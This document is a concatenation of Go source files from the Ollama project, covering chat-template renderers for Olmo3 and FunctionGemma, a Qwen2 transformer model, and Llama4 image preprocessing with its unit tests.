<function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "book_flight", "parameters": {"type": "object", "properties": {"from": {"type": "string"}, "to": {"type": "string"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "Book a flight<|im_end|>\n" + "<|im_start|>assistant\n" + `<function_calls>book_flight(from="SFO", to="NYC")</function_calls><|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "assistant prefill - no generation prompt", msgs: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Olmo3Renderer{}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/functiongemma.go
model/renderers/functiongemma.go
package renderers import ( "fmt" "sort" "strings" "github.com/ollama/ollama/api" ) type FunctionGemmaRenderer struct{} const defaultSystemMessage = "You can do function calling with the following functions:" func (r *FunctionGemmaRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder sb.WriteString("<bos>") var systemMessage string var loopMessages []api.Message if len(messages) > 0 && (messages[0].Role == "system" || messages[0].Role == "developer") { systemMessage = messages[0].Content loopMessages = messages[1:] } else { loopMessages = messages } if systemMessage != "" || len(tools) > 0 { sb.WriteString("<start_of_turn>developer\n") if systemMessage != "" { sb.WriteString(strings.TrimSpace(systemMessage)) } if len(tools) > 0 { if systemMessage != "" { sb.WriteString("\n") } if strings.TrimSpace(systemMessage) != defaultSystemMessage { // Only add default message if user does not provide it sb.WriteString(defaultSystemMessage) } } for _, tool := range tools { sb.WriteString(r.renderToolDeclaration(tool)) } sb.WriteString("<end_of_turn>\n") } // Track previous message type for tool response handling prevMessageType := "" for i, message := range loopMessages { switch message.Role { case "assistant": if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>model\n") } prevMessageType = "" if message.Content != "" { sb.WriteString(strings.TrimSpace(message.Content)) } if len(message.ToolCalls) > 0 { for _, tc := range message.ToolCalls { sb.WriteString(r.formatToolCall(tc)) } // After tool calls, expect tool responses if i+1 < len(loopMessages) && loopMessages[i+1].Role == "tool" { sb.WriteString("<start_function_response>") prevMessageType = "tool_call" } else { sb.WriteString("<end_of_turn>\n") } } else { sb.WriteString("<end_of_turn>\n") } case "user": if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>user\n") } prevMessageType = "" sb.WriteString(strings.TrimSpace(message.Content)) sb.WriteString("<end_of_turn>\n") case "tool": toolName := "" // Find the tool name from the previous assistant's tool call for j := i - 1; j >= 0; j-- { if loopMessages[j].Role == "assistant" && len(loopMessages[j].ToolCalls) > 0 { // Count how many tool messages came before this one toolIdx := 0 for k := j + 1; k < i; k++ { if loopMessages[k].Role == "tool" { toolIdx++ } } if toolIdx < len(loopMessages[j].ToolCalls) { toolName = loopMessages[j].ToolCalls[toolIdx].Function.Name } break } } if prevMessageType != "tool_call" { sb.WriteString("<start_function_response>") } sb.WriteString("response:" + toolName + "{" + r.formatArgValue(message.Content) + "}<end_function_response>") prevMessageType = "tool_response" default: sb.WriteString("<start_of_turn>" + message.Role + "\n") sb.WriteString(strings.TrimSpace(message.Content)) sb.WriteString("<end_of_turn>\n") } } if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>model\n") } return sb.String(), nil } func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string { var sb strings.Builder fn := tool.Function sb.WriteString("<start_function_declaration>declaration:" + fn.Name + "{") sb.WriteString("description:<escape>" + fn.Description + "<escape>") if fn.Parameters.Properties != nil || fn.Parameters.Type != "" { sb.WriteString(",parameters:{") needsComma := false // Only include properties:{} if there are actual properties if fn.Parameters.Properties != nil && fn.Parameters.Properties.Len() > 0 { sb.WriteString("properties:{") r.writeProperties(&sb, fn.Parameters.Properties) sb.WriteString("}") needsComma = true } if len(fn.Parameters.Required) > 0 { if needsComma { sb.WriteString(",") } sb.WriteString("required:[") for i, req := range fn.Parameters.Required { if i > 0 { sb.WriteString(",") } sb.WriteString("<escape>" + req + "<escape>") } sb.WriteString("]") needsComma = true } if fn.Parameters.Type != "" { if needsComma { sb.WriteString(",") } sb.WriteString("type:<escape>" + strings.ToUpper(fn.Parameters.Type) + "<escape>") } sb.WriteString("}") } sb.WriteString("}<end_function_declaration>") return sb.String() } func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props *api.ToolPropertiesMap) { keys := make([]string, 0, props.Len()) for k := range props.All() { keys = append(keys, k) } sort.Strings(keys) first := true for _, name := range keys { prop, _ := props.Get(name) if !first { sb.WriteString(",") } first = false sb.WriteString(name + ":{description:<escape>") sb.WriteString(prop.Description) sb.WriteString("<escape>") if len(prop.Type) > 0 { sb.WriteString(",type:<escape>" + strings.ToUpper(prop.Type[0]) + "<escape>") } sb.WriteString("}") } } func (r *FunctionGemmaRenderer) formatToolCall(tc api.ToolCall) string { var sb strings.Builder sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{") keys := make([]string, 0, tc.Function.Arguments.Len()) for k := range tc.Function.Arguments.All() { keys = append(keys, k) } sort.Strings(keys) first := true for _, key := range keys { value, _ := tc.Function.Arguments.Get(key) if !first { sb.WriteString(",") } first = false sb.WriteString(key + ":" + r.formatArgValue(value)) } sb.WriteString("}<end_function_call>") return sb.String() } func (r *FunctionGemmaRenderer) formatArgValue(value any) string { switch v := value.(type) { case string: return "<escape>" + v + "<escape>" case bool: if v { return "true" } return "false" case float64: if v == float64(int64(v)) { return fmt.Sprintf("%d", int64(v)) } return fmt.Sprintf("%v", v) case int, int64, int32: return fmt.Sprintf("%d", v) case map[string]any: return r.formatMapValue(v) case []any: return r.formatArrayValue(v) default: return fmt.Sprintf("%v", v) } } func (r *FunctionGemmaRenderer) formatMapValue(m map[string]any) string { var sb strings.Builder sb.WriteString("{") keys := make([]string, 0, len(m)) for k := range m { keys = append(keys, k) } sort.Strings(keys) first := true for _, key := range keys { if !first { sb.WriteString(",") } first = false sb.WriteString(key + ":" + r.formatArgValue(m[key])) } sb.WriteString("}") return sb.String() } func (r *FunctionGemmaRenderer) formatArrayValue(arr []any) string { var sb strings.Builder sb.WriteString("[") for i, item := range arr { if i > 0 { sb.WriteString(",") } sb.WriteString(r.formatArgValue(item)) } sb.WriteString("]") return sb.String() }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/models.go
model/models/models.go
package models import ( _ "github.com/ollama/ollama/model/models/bert" _ "github.com/ollama/ollama/model/models/deepseek2" _ "github.com/ollama/ollama/model/models/deepseekocr" _ "github.com/ollama/ollama/model/models/gemma2" _ "github.com/ollama/ollama/model/models/gemma3" _ "github.com/ollama/ollama/model/models/gemma3n" _ "github.com/ollama/ollama/model/models/gptoss" _ "github.com/ollama/ollama/model/models/llama" _ "github.com/ollama/ollama/model/models/llama4" _ "github.com/ollama/ollama/model/models/mistral3" _ "github.com/ollama/ollama/model/models/mllama" _ "github.com/ollama/ollama/model/models/nomicbert" _ "github.com/ollama/ollama/model/models/olmo3" _ "github.com/ollama/ollama/model/models/qwen2" _ "github.com/ollama/ollama/model/models/qwen25vl" _ "github.com/ollama/ollama/model/models/qwen3" _ "github.com/ollama/ollama/model/models/qwen3vl" )
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen2/model.go
model/models/qwen2/model.go
package qwen2 import ( "cmp" "fmt" "math" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads int headDim, ropeDim int eps, ropeBase, ropeScale float32 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, cmp.Or(o.ropeDim, o.headDim, o.hiddenSize/o.numHeads), o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX()) } type Attention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (attn Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) query := attn.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) key := attn.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) value := attn.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, headDim*opts.numHeads, batchSize) return attn.Output.Forward(ctx, attention) } type MLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp MLP) Forward(ctx ml.Context, hiddenStates ml.Tensor) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type DecoderLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *Attention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP } func (d DecoderLayer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.MLP.Forward(ctx, hiddenStates) return hiddenStates.Add(ctx, residual) } type Model struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []DecoderLayer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } // Forward implements model.Model. func (m Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, &m.Options) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) hiddenStates = m.Output.Forward(ctx, hiddenStates) return hiddenStates, nil } func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } func New(c fs.Config) (model.Model, error) { // This model currently only supports the gpt2 tokenizer if c.String("tokenizer.ggml.model") == "llama" { return nil, fmt.Errorf("unsupported tokenizer: llama") } // detect library/qwen model(s) which are incompatible if strings.HasPrefix(c.String("general.name"), "Qwen2-beta") { return nil, fmt.Errorf("unsupported model: %s", c.String("general.name")) } m := Model{ Layers: make([]DecoderLayer, c.Uint("block_count")), BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.key_length")), ropeDim: int(c.Uint("rope.dimension_count")), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), eps: c.Float("attention.layer_norm_rms_epsilon"), }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } func init() { model.Register("qwen2", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/process_image.go
model/models/llama4/process_image.go
package llama4 import ( "cmp" "image" "math" "slices" "sort" "golang.org/x/image/draw" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type ImageProcessor struct { imageSize, patchSize, numChannels, maxUpscalingSize int } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), numChannels: int(c.Uint("vision.num_channels", 3)), maxUpscalingSize: int(c.Uint("vision.max_upscaling_size", 448)), } } func factors(n int) []int { var result []int seen := make(map[int]bool) for i := 1; i <= n/2; i++ { if n%i == 0 && !seen[i] { result = append(result, i) seen[i] = true } } result = append(result, n) sort.Ints(result) return result } func (p ImageProcessor) supportedResolutions() []image.Point { var resolutions []image.Point aspectMap := make(map[float64][]image.Point) for i := p.patchSize; i >= 1; i-- { for _, f := range factors(i) { x := f y := i / f k := float64(y) / float64(x) aspectMap[k] = append(aspectMap[k], image.Point{x, y}) } } for _, v := range aspectMap { for _, i := range v { resolutions = append(resolutions, image.Point{i.X * p.imageSize, i.Y * p.imageSize}) } } return resolutions } func (p ImageProcessor) bestResolution(img image.Point, possibleResolutions []image.Point, resizeToMaxCanvas bool) image.Point { w, h := img.X, img.Y scales := make([]float64, len(possibleResolutions)) for i, res := range possibleResolutions { scaleW := float64(res.X) / float64(w) scaleH := float64(res.Y) / float64(h) scale := min(scaleW, scaleH) scales[i] = scale } minAboveOne := func(scales []float64) (float64, bool) { min := math.MaxFloat64 found := false for _, s := range scales { if s >= 1.0 && s < min { min = s found = true } } return min, found } bestScale, ok := minAboveOne(scales) if resizeToMaxCanvas || !ok { bestScale = slices.Max(scales) } var bestOptions []image.Point for i, scale := range scales { if math.Abs(scale-bestScale) < 1e-6 { bestOptions = append(bestOptions, possibleResolutions[i]) } } var chosenResolution image.Point if len(bestOptions) > 1 { chosenResolution = slices.MinFunc(bestOptions, func(a, b image.Point) int { return cmp.Compare(a.X*a.Y, b.X*b.Y) }) } else { chosenResolution = bestOptions[0] } return chosenResolution } func (p ImageProcessor) maxResolution(imageRes, targetRes image.Point) image.Point { scaleW := float64(targetRes.X) / float64(imageRes.X) scaleH := float64(targetRes.Y) / float64(imageRes.Y) var newRes image.Point if scaleW < scaleH { newRes = image.Point{ targetRes.X, int(min(math.Floor(float64(imageRes.Y)*scaleW), float64(targetRes.Y))), } } else { newRes = image.Point{ int(min(math.Floor(float64(imageRes.X)*scaleH), float64(targetRes.X))), targetRes.Y, } } return newRes } func (p ImageProcessor) pad(src image.Image, outputSize image.Point) image.Image { dst := image.NewRGBA(image.Rect(0, 0, outputSize.X, outputSize.Y)) draw.Draw(dst, src.Bounds(), src, image.Point{}, draw.Over) return dst } func (p ImageProcessor) ProcessImage(img image.Image) (pixelsLocal, pixelsGlobal []float32, targetSize image.Point, _ error) { img = imageproc.Composite(img) targetSize = p.bestResolution(img.Bounds().Max, p.supportedResolutions(), false) targetSizeWithoutDistortion := targetSize if p.maxUpscalingSize > 0 { targetSizeWithoutDistortion = p.maxResolution(img.Bounds().Max, targetSize) targetSizeWithoutDistortion.X = min(max(img.Bounds().Max.X, p.maxUpscalingSize), targetSize.X) targetSizeWithoutDistortion.Y = min(max(img.Bounds().Max.Y, p.maxUpscalingSize), targetSize.Y) } newSizeWithoutDistortion := p.maxResolution(img.Bounds().Max, targetSizeWithoutDistortion) padded := p.pad(imageproc.Resize(img, newSizeWithoutDistortion, imageproc.ResizeBilinear), targetSize) pixelsLocal = imageproc.Normalize(padded, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD, true, true) if targetSize.X/p.imageSize*targetSize.Y/p.imageSize > 1 { padded := imageproc.Resize(img, image.Point{p.imageSize, p.imageSize}, imageproc.ResizeBilinear) pixelsGlobal = imageproc.Normalize(padded, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD, true, true) } return pixelsLocal, pixelsGlobal, targetSize, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/process_image_test.go
model/models/llama4/process_image_test.go
package llama4 import ( "cmp" "image" "image/color" "reflect" "slices" "testing" gocmp "github.com/google/go-cmp/cmp" ) func TestFactors(t *testing.T) { tests := []struct { name string input int expected []int }{ { name: "factors of 1", input: 1, expected: []int{1}, }, { name: "factors of 2", input: 2, expected: []int{1, 2}, }, { name: "factors of 6", input: 6, expected: []int{1, 2, 3, 6}, }, { name: "factors of 28", input: 28, expected: []int{1, 2, 4, 7, 14, 28}, }, { name: "factors of 49", input: 49, expected: []int{1, 7, 49}, }, { name: "factors of 97 (prime)", input: 97, expected: []int{1, 97}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { actual := factors(tt.input) if !reflect.DeepEqual(actual, tt.expected) { t.Errorf("factors(%d) = %v; want %v", tt.input, actual, tt.expected) } }) } } func TestSupportedResolutions(t *testing.T) { expectedResolutions := []image.Point{ {X: 3360, Y: 336}, {X: 672, Y: 2688}, {X: 336, Y: 1344}, {X: 336, Y: 4032}, {X: 1008, Y: 1344}, {X: 1344, Y: 1008}, {X: 336, Y: 1680}, {X: 1680, Y: 336}, {X: 336, Y: 5040}, {X: 4032, Y: 336}, {X: 2352, Y: 336}, {X: 2688, Y: 672}, {X: 1344, Y: 336}, {X: 5376, Y: 336}, {X: 2352, Y: 672}, {X: 672, Y: 1008}, {X: 1008, Y: 672}, {X: 336, Y: 5376}, {X: 1680, Y: 1008}, {X: 5040, Y: 336}, {X: 336, Y: 3024}, {X: 3024, Y: 336}, {X: 336, Y: 2688}, {X: 672, Y: 1344}, {X: 336, Y: 672}, {X: 336, Y: 2352}, {X: 2016, Y: 672}, {X: 1008, Y: 336}, {X: 336, Y: 3360}, {X: 336, Y: 4368}, {X: 1008, Y: 1680}, {X: 336, Y: 4704}, {X: 4704, Y: 336}, {X: 1344, Y: 672}, {X: 672, Y: 336}, {X: 2688, Y: 336}, {X: 3696, Y: 336}, {X: 2016, Y: 336}, {X: 1344, Y: 1344}, {X: 1008, Y: 1008}, {X: 672, Y: 672}, {X: 336, Y: 336}, {X: 4368, Y: 336}, {X: 672, Y: 2016}, {X: 336, Y: 1008}, {X: 336, Y: 3696}, {X: 672, Y: 1680}, {X: 1680, Y: 672}, {X: 336, Y: 2016}, {X: 672, Y: 2352}, } sortResolutionFunc := func(a, b image.Point) int { return cmp.Or(cmp.Compare(a.X, b.X), cmp.Compare(a.Y, b.Y)) } slices.SortStableFunc(expectedResolutions, sortResolutionFunc) imgProc := ImageProcessor{ imageSize: 336, patchSize: 16, numChannels: 3, maxUpscalingSize: 448, } actualResolutions := imgProc.supportedResolutions() slices.SortStableFunc(actualResolutions, sortResolutionFunc) if diff := gocmp.Diff(expectedResolutions, actualResolutions); diff != "" { t.Errorf("supportedResolutions() mismatch (-want +got):\n%s", diff) } } func TestBestResolution(t *testing.T) { tests := []struct { name string size image.Point resolutions []image.Point max bool expected image.Point }{ { "normal", image.Point{800, 600}, []image.Point{ {300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}, }, false, image.Point{800, 600}, }, { "max", image.Point{800, 600}, []image.Point{ {300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}, }, true, image.Point{1600, 1200}, }, { "mid", image.Point{1000, 700}, []image.Point{ {300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}, }, false, image.Point{1024, 768}, }, { "smol", image.Point{100, 100}, []image.Point{ {300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}, }, false, image.Point{300, 200}, }, { "huge", image.Point{10000, 10000}, []image.Point{ {300, 200}, {640, 480}, {800, 600}, {1024, 768}, {1600, 1200}, }, false, image.Point{1600, 1200}, }, } p := ImageProcessor{} for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { actual := p.bestResolution(tt.size, tt.resolutions, tt.max) if diff := gocmp.Diff(tt.expected, actual); diff != "" { t.Errorf("best resolution mismatch (-want +got):\n%s", diff) } }) } } func TestMaxResolution(t *testing.T) { tests := []struct { name string origRes image.Point targetRes image.Point expected image.Point }{ { "normal", image.Point{800, 600}, image.Point{800, 600}, image.Point{800, 600}, }, { "skew", image.Point{800, 600}, image.Point{1100, 700}, image.Point{933, 700}, }, } p := ImageProcessor{} for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { actual := p.maxResolution(tt.origRes, tt.targetRes) if !reflect.DeepEqual(actual, tt.expected) { t.Errorf("max resolution; got %v want %v", actual, tt.expected) } }) } } func TestProcessImage(t *testing.T) { imgProc := ImageProcessor{ imageSize: 336, patchSize: 16, numChannels: 3, maxUpscalingSize: 448, } generateImage := func(seed int) image.Image { width, height := 20, 10 img := image.NewRGBA(image.Rect(0, 0, width, height)) for x := range width { // Use the seed to vary color generation r := uint8((seed + x*11) % 256) g := uint8((seed + x*17) % 256) b := uint8((seed + x*23) % 256) c := color.RGBA{R: r, G: g, B: b, A: 255} for y := range height { img.Set(x, y, c) } } return img } pixelsLocal, pixelsGlobal, targetSize, err := imgProc.ProcessImage(generateImage(12)) if err != nil { t.Error(err) } if n := len(pixelsLocal); n != 336*336*3 { t.Errorf("unexpected size of f32s: %d", n) } if n := len(pixelsGlobal); n > 0 { t.Errorf("unexpected size of f32s: %d", n) } if !targetSize.Eq(image.Point{336, 336}) { t.Errorf("unexpected target size: %v", targetSize) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model.go
model/models/llama4/model.go
package llama4 import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.BytePairEncoding ImageProcessor *VisionModel `gguf:"v"` *Projector `gguf:"mm"` *TextModel } type Projector struct { Linear1 *nn.Linear `gguf:"linear_1"` } func (p *Projector) Forward(ctx ml.Context, visionOutputs ml.Tensor) ml.Tensor { return p.Linear1.Forward(ctx, visionOutputs) } func New(c fs.Config) (model.Model, error) { m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+(?i:'s|'t|'re|'ve|'m|'ll|'d)?|[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*(?i:'s|'t|'re|'ve|'m|'ll|'d)?|\p{N}{1,3}| ?[^\s\p{L}\p{N}]+[\r\n/]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), ImageProcessor: newImageProcessor(c), VisionModel: newVisionModel(c), TextModel: newTextModel(c), } m.Cache = kvcache.NewWrapperCache( kvcache.NewChunkedAttentionCache(int32(c.Uint("attention.chunk_size", 8192)), m.Shift), kvcache.NewCausalCache(m.Shift), ) return &m, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) < 1 { return nil, model.ErrNoVisionModel } img, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } pixelsLocal, pixelsGlobal, size, err := m.ProcessImage(img) if err != nil { return nil, err } tilesLocal := ctx.Input().FromFloats(pixelsLocal, size.X, size.Y, m.numChannels) ratioW, ratioH := size.X/m.imageSize, size.Y/m.imageSize tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW, ratioW, size.Y, m.numChannels).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW*size.Y/ratioH, ratioH, ratioW, m.numChannels).Permute(ctx, 0, 3, 2, 1).Contiguous(ctx) tilesLocal = tilesLocal.Reshape(ctx, size.X/ratioW, size.Y/ratioH, m.numChannels, ratioH*ratioW) pixelValues := tilesLocal if len(pixelsGlobal) > 0 { tilesGlobal := ctx.Input().FromFloats(pixelsGlobal, m.imageSize, m.imageSize, m.numChannels) pixelValues = pixelValues.Concat(ctx, tilesGlobal, 3) } visionOutputs := m.VisionModel.Forward(ctx, pixelValues) visionOutputs = visionOutputs.Reshape(ctx, visionOutputs.Dim(0), visionOutputs.Dim(1)*visionOutputs.Dim(2)*visionOutputs.Dim(3)) projectedOutputs := m.Projector.Forward(ctx, visionOutputs) var multimodal []input.Multimodal aspectRatio := image.Point{ratioW, ratioH} var offset int patchesPerChunk := projectedOutputs.Dim(1) if aspectRatio.Y*aspectRatio.X > 1 { patchesPerChunk = projectedOutputs.Dim(1) / (aspectRatio.X*aspectRatio.Y + 1) for range aspectRatio.Y { for x := range aspectRatio.X { view := projectedOutputs.Slice(ctx, 1, offset, offset+patchesPerChunk, 1) var separator separator if x < aspectRatio.X-1 { separator.x = true // <|tile_x_separator|> } else { separator.y = true // <|tile_y_separator|> } multimodal = append(multimodal, input.Multimodal{Tensor: view, Data: &separator}) offset += patchesPerChunk } } } view := projectedOutputs.Slice(ctx, 1, offset, offset+patchesPerChunk, 1) multimodal = append(multimodal, input.Multimodal{Tensor: view, Data: &separator{}}) return multimodal, nil } type separator struct { x bool y bool } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { var result []*input.Input for _, inp := range inputs { if len(inp.Multimodal) == 0 { result = append(result, inp) continue } var imageInputs []*input.Input imageInputs = append(imageInputs, &input.Input{Token: 200080}) // <|image_start|> for i, mm := range inp.Multimodal { patchesPerChunk := mm.Tensor.Dim(1) if i < len(inp.Multimodal)-1 { separator := mm.Data.(*separator) imageInputs = append(imageInputs, &input.Input{Token: 200092, Multimodal: []input.Multimodal{{Tensor: mm.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: patchesPerChunk}) // <|patch|> imageInputs = append(imageInputs, slices.Repeat([]*input.Input{{Token: 200092}}, patchesPerChunk-1)...) if separator.x { imageInputs = append(imageInputs, &input.Input{Token: 200084}) // <|tile_x_separator|> } if separator.y { imageInputs = append(imageInputs, &input.Input{Token: 200085}) // <|tile_y_separator|> } } else { imageInputs = append(imageInputs, &input.Input{Token: 200090}) // <|image|> imageInputs = append(imageInputs, &input.Input{Token: 200092, Multimodal: []input.Multimodal{{Tensor: mm.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: patchesPerChunk}) // <|patch|> imageInputs = append(imageInputs, slices.Repeat([]*input.Input{{Token: 200092}}, patchesPerChunk-1)...) imageInputs = append(imageInputs, &input.Input{Token: 200080}) // <|image_end|> } } result = append(result, imageInputs...) } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) return m.TextModel.Forward(ctx, batch.Inputs, positions, batch.Outputs, batch, m.Cache), nil } func init() { model.Register("llama4", New) }
go
MIT
